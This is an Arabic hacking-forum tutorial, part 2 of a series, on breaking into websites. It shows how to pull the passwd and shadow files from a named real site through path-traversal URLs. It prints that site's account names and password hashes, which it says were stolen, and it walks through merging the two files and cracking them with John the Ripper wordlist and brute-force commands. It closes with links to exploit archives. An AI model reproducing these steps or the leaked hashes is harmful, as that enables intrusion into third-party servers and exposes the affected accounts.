هاكر الاردن -المنتدى الشامل في الاختراق و الحماية من طرق وبرامج
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

هاكر الاردن -المنتدى الشامل في الاختراق و الحماية من طرق وبرامج


 
الرئيسيةالهاكرز الاردنيأحدث الصورالتسجيلدخول

 

 تعلم الأختراق كاملا أدخل ولاتتردد بموضوع واحد تصبح محترف ( 2 )

اذهب الى الأسفل 
كاتب الموضوعرسالة
Mr Ayman
* Co Admin *
* Co Admin *
Mr Ayman


ذكر
عدد الرسائل : 39
العمر : 35
البلد - الموقع : الاْردن
العمل/الترفيه : طالب (جامعة عمان الأهلية)
الديانة : الاسلام وافتخر
تاريخ التسجيل : 04/05/2008

تعلم الأختراق كاملا أدخل ولاتتردد بموضوع واحد تصبح محترف  ( 2 ) Empty
مُساهمةموضوع: تعلم الأختراق كاملا أدخل ولاتتردد بموضوع واحد تصبح محترف ( 2 )   تعلم الأختراق كاملا أدخل ولاتتردد بموضوع واحد تصبح محترف  ( 2 ) Icon_minitimeالسبت يونيو 07, 2008 8:09 pm

تعلم الأختراق كاملا أدخل ولاتتردد بموضوع واحد تصبح محترف  ( 2 ) 12 تعلم الأختراق كاملا أدخل ولاتتردد بموضوع واحد تصبح محترف

- بماذا يفيدني هذا الملف ؟
~~~~~~~~~~~~~~~~~~~~~~~~~~
يفيدك يا الحبيب في معرفه كلمات السر وإسماء المستخدمين لكي تقوم بإختراق الموقع ، ولكن لاتفرح ...! كلمة المرور تكون مشفره ، لا هذا ليس صحيحا تماما ، كانت مشفره زمان ولكن في الوقت الحالي هي مضلله

*او x = كلمة سر مضلله Shadowed

EpGw4GekZ1B9U = كلمة سر مشفره على مقياس DES ، هذا النوع من التشفير المستخدم في ليونكس و FreeBSD وعدد من الأنظمه الأخرى ضعيف ، وهو دائما مكون من 13 حرف ورقم كبتل وسمول ولا يحتوي من بينها على رمز ابداً ، بإستثناء ويندوز فهو يستخدم نوع آخر من التشفير وهو نوع ضعيف أيضا Smile

- كيف يمكن معرفة كلمة السر من خلال ملف الباسورد password file ؟
~~~~~~~~~~~~
إضغط Ctrl + Shift في القسم الأيمن من لوحه المفاتيح لتقراء من اليسار الى اليمين ، ثم إذهب الى الاعلى حيث وضعت مثال لملف كلمة مرور تم سحبه من الموقع hwwilson.com Smile ...
تفسير هذا السطر :-
root:x:0تعلم الأختراق كاملا أدخل ولاتتردد بموضوع واحد تصبح محترف  ( 2 ) 1Super-User:/:/sbin/sh

root
هذا السطر يوضخ المستخدم واللي هو الجذر root

وكلمة المرور ، ويتضح انها مضلله ، يعني مكانها العلامة x ، لا تفكر في كسرها فهذا مستحيل ، لكن عليك البحث عن ملف ثاني تم تخزين فيه كلمة المرور ، ستعرف بعد قليل كيف تفعل هذا


0
هذا هو رقم المستخدم


1
رقم المجموعه

Super-User:/:/sbin/sh
هذا مش مهم

- ماالفرق بين إذا كان الملف (مشفر encryyption) وإذا كان (مضلل shadowed) ؟
~~~~~~~~~~~~~~~~~~~~~~
الملف المضلل shadow file يكون مكان كلمة المرور رمز مثل * أو x أو # أو ! وهذا مثال لها
root:x:0تعلم الأختراق كاملا أدخل ولاتتردد بموضوع واحد تصبح محترف  ( 2 ) 1Super-User:/:/sbin/sh

لكن الملف المشفر تكون كلمة المرور مكتوبه ولكن مشفره مثل هذه
root:Q71KBZlvYSnVw:0تعلم الأختراق كاملا أدخل ولاتتردد بموضوع واحد تصبح محترف  ( 2 ) 1Super-User:/:/sbin/sh
هنا تكون كلمة المرور المشفره هي Q71KBZlvYSnVw

الآن طلعت الصوره صافيه ....

- وماذا لو كان ملف كلمة المرور مشفر ، ككيف يتم كسره ؟
البرامج كثيره وأشهرها هو Crack 5.0a و john the ripper ويوجد آخر بإسم jack the ripper ، إذا كنت ممن يجيدون العمل في ليونكس فهذا جيد ، عليك تنزيل Crack 5a ، وأفضل john the ripper لمن يريد إستخدام ويندوز ، وللمعولميه فإن john the ripper عمل أيضا تحت ليونكس .....

طريقه عمل هذه البرامج :-
يقدم للبرنامج wordlist ويقوم بمطابقه الكلمات الموجوده به ، كما هو موضح هنا .
--- \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ Q2wrtUo9LPq2R <------
يتم مقارنه | // <--- {البدايه} كلمة المرور | /---/ المشفره مع | / 1 / أخذ كلمة من الـ wordlist الكلمات | / 0 / _____________ المختاره حتى | {تشفير}/ 1 / | | يتم --------^--------- / 0 / \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\----| word list | التطابق Q6LiJ6ct1oUBz <-كلمة مرور مشفره /---/ الكلمة المختاره | |_____________| ------------------ //--------song------ \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ إذا حدث تطابق فهذا يعني أن
كلمة المرور التي كانت مشفره
قد كسرت ..Smile
| ------------------------------------------------------------------------------- | ملاحظه مهمه :- يتم عمل دوره مثل الموضحه في الأعلى لكسر كلمات المرور المشفره بسرعه
{النهايه} | 5000 تجربه في الثانيه (إختبرناjohn the ripperعلى معالج بسرعه 700)


لتشغيل john the ripper من واجه دوس نكتب الأمر التالي

john -w:wordlist passwd
حيث wordlist هو ملف القاموس الذي يحتوي على عدد كبير من الكلمات
و passwd هو الملف الذي يحتوي على كلمات المرور المشفره والتي نود معرفتها
---
Microsoft(R) Windows 98
C)Copyright Microsoft Corp 1981-1998.(

E:\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\Desktop\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\junk\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\john the ripper>john -w:passwd passwd.txt

by Sola 97,John the Ripper Version 1.3 Copyright (c) 1996

Loaded 1 password

**v: 0 c: 6401 t: 0:00:00:01 99% c/s: 6401 w: *****DONE

>E:\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\Desktop\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\junk\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\john the ripper
---

وسوف تحفظ النتيجه في الملف john.pot الموجود في نفس الدايروكتري ، وعليك حذف هذا الملف إذا أردت البدء في عمليه كسر جديده ويمكنك تغيير إسمه أو نقله في مكان آخر بدل من حذفه إذا كنت ترى ذلك ...

هناك طريقه اخرى للكسر وهي تسمى بـ brute force أو بالعربي القوه العنيفه ، وهي لا تحتاج لملف wordlist ، هي تقوم بتجربه كل الحروف والأرقام والرموز مع بعض في خانتان و3خانات واربع وخمس ..الخ حتى تصيب كلمة المرور الصحيحه ، وأنا افضل ان تستخدم ملفات wordlist فذلك لن يأخذ معك في الا ثواني فقط لأن عمليه التجربه الموضحه في الرسم بالأعلى ذكرت بأنه سرعة تجربه الكلمات يتجاوز 5000 كلمة في الثانيه ، إذا لم تفلح ملفات wordlist حينها إذهب الى القوه العنيفه brute force
الأمر التالي يجعل john the ripper يستخدم طريقه brute force السابق ذكرها

john -i passwd

حيث passwd هو ملف كلمة المرور المراد كسره ، إذا قمت بتجربه هذه الطريقه إضغط إنتر أثناء عمل البرنامج لترى الى أين توصل ...


- ولو كان ملف كلمة المرور مضلل ، ماذا ععلي ان أعمل ؟
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~
دائما سوف تواجه كلمة مرور مضلله ، لكن هناك طريقه تسمى Unshadow لحل هذه المشكله !!
إذا واجهت ملف مضلل عليك البحث عن ملف ثاني يسمى ملف الشادو (ملف الظل) shadow file
وهذا الملف يوجد في امكنه معينه وكل نظام تشغيل له مكان يوضع به هذا الملف ، اليك الجدول التالي :

Linux : /etc/shadow token = *
SunOS : /etc/shadow token = يأخذ أشكال متعدده اشهرها هو *
FreeBSD : /etc/master.passwd or /etc/shadow token = * والجديد هو x
IRIX : /etc/shadow token = x
AIX : /etc/security/passwd token = !
ConvexOS : /etc/shadow or /etc/shadpw token = *

token تعني الرمز الذي يوجد في الملف passwd ، وهذا يفيد في تسهيل المهمه ، يعني لو مثلا لقيت علامه ! بدل كلمه المرور فهذا يعني ان كلمة المرور مسجله في /etc/security/passwd ، لقد إستعنت بالجدول السابق ذكره ، مثال على ملف شادو (أكرر ملف شادو هو الملف الذي تخزن فيه كلمة المرور الصحيحه)

هذا ملف shadow
---
root:EpGw4GekZ1B9U:11390:::::: bin:NP:6445:::::: sys:NP:6445::::::
adm:IyEDQ6VoRlLHM:10935:::::: #admin:9z8VMm6Ovcvsc:10935:::::: lp:NP:6445::::::
---
نلاحظ ان كلمات السر موجوده Smile

الخطوه الأخيره وهي دمج ملف الباسورد passwd file مع shadow passwd لنحصل على ملف متكامل ونقدمه الى برامج الكسر السابق ذكرها...

هذا ملف باسورد حصلنا عليه من
[/size]
http://wilsonweb2.hwwilson.com/cgi-b.../../etc/passwd
-------------------------------------------------------------------------------------------------
root:x:0تعلم الأختراق كاملا أدخل ولاتتردد بموضوع واحد تصبح محترف  ( 2 ) 1Super-User:/:/sbin/sh daemon:xتعلم الأختراق كاملا أدخل ولاتتردد بموضوع واحد تصبح محترف  ( 2 ) 11::/: bin:xتعلم الأختراق كاملا أدخل ولاتتردد بموضوع واحد تصبح محترف  ( 2 ) 22::/usr/bin: sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/: uucp:x:5:5:uucp Admin:/usr/lib/uucp: nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network Admin:/usr/net/nls: nobody:x:60001:60001:Nobody:/: noaccess:x:60002:60002:No Access User:/: nobody4:x:65534:65534:SunOS 4.x Nobody:/: www:x:102:1001::/web:/bin/csh mirrors:x:102:1001::/web/mirrors:/web/mirrors/menu sid:x:103:10::/export/home/sid:/bin/ksh mirror:x:104تعلم الأختراق كاملا أدخل ولاتتردد بموضوع واحد تصبح محترف  ( 2 ) 1:/home/mirror:/bin/sh admin:x:105تعلم الأختراق كاملا أدخل ولاتتردد بموضوع واحد تصبح محترف  ( 2 ) 1:/home/admin:/bin/sh jerome:x:106تعلم الأختراق كاملا أدخل ولاتتردد بموضوع واحد تصبح محترف  ( 2 ) 1:/home/jerome:/bin/sh erl:x:102تعلم الأختراق كاملا أدخل ولاتتردد بموضوع واحد تصبح محترف  ( 2 ) 1:/home/erl:/bin/sh landmark:x:1000:1000::/web/landmark:/bin/ksh
---
ومن الـ token الموضح واللي هو x نعرف من خلال الجدول السابق ذكره بأن كلمة المرور الصحيحه في الدليل /etc/shadow

إذن نتوجه بالمتصفح الى
http://wilsonweb2.hwwilson.com/cgi-b.../../etc/shadow

لنحصل على الملف
---
root:XOT4AiUKMRcKQ:10643:::::: daemon:NP:6445:::::: bin:NP:6445:::::: sys:NP:6445:::::: adm:NP:6445:::::: lp:NP:6445:::::: smtp:NP:6445:::::: uucp:NP:6445:::::: nuucp:NP:6445:::::: listen:*LK*::::::: nobody:NP:6445:::::: noaccess:NP:6445:::::: nobody4:NP:6445:::::: www:WJctaI.8rcSe2:10507:::::: mirrors:gg9p.5kwGw1MY:10911:::::: sid:stXldZKnujFYo:10515:::::: mirror:iMPWwbrU.gB4k:10601:::::: admin:hDhB5YYKyWgQw:10976:::::: jerome:XDqnOl32tPoGo:10976:::::: erl:0jE9Xem4aJYeI:10982:::::: landmark:0jCgWu6vl8g0s:11185::::::
---
نقوم بنسخ كلمات السر الموجوده فيه ولصقها مكان علامه x في ملف الباسورد ، وهكذا مع جميع الحسابات لنحصل على ملف لمة مرور كامل ومتكامل ونقدمه الى برامج الكسر

ملاحظه مهمه :-
عليك جعل كل حساب في سطر ، يعني تربتها لتتعرف عليها برامج الكسر ...

************************************************** *******************
أرشيف لثغرات
www.securiteam.com/exploits/archive.html
أرشيف لثغرات
www.ussrback.com
أرشيف ثغرات + الكثير
www.secureroot.com
أرشيف ثغرات
www.rootshell.com
أرشيف ثغرات
www.ussrback.com
مواقع لثغرات
www.secureroot.com/category/exploits
دليل لمواقع الهاكينق
www.hitboss.com/Hacking
محرك بحث لا غني عنه
http://www.undergroundnews.com/resou...und/search.asp
Warez.com-Underground
www.warez.com
Hacking (ممتاز لمن يريد البدايه)
www.neworder.box.sk
Security Search Engine
www.bugs2k.com
insecure
www.insecure.org

==================================================
مع تحيات
الرجوع الى أعلى الصفحة اذهب الى الأسفل
https://hacker-jor.own0.com
 
تعلم الأختراق كاملا أدخل ولاتتردد بموضوع واحد تصبح محترف ( 2 )
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
هاكر الاردن -المنتدى الشامل في الاختراق و الحماية من طرق وبرامج :: الاختراق :: اختراق المواقع و المنتديات-
انتقل الى: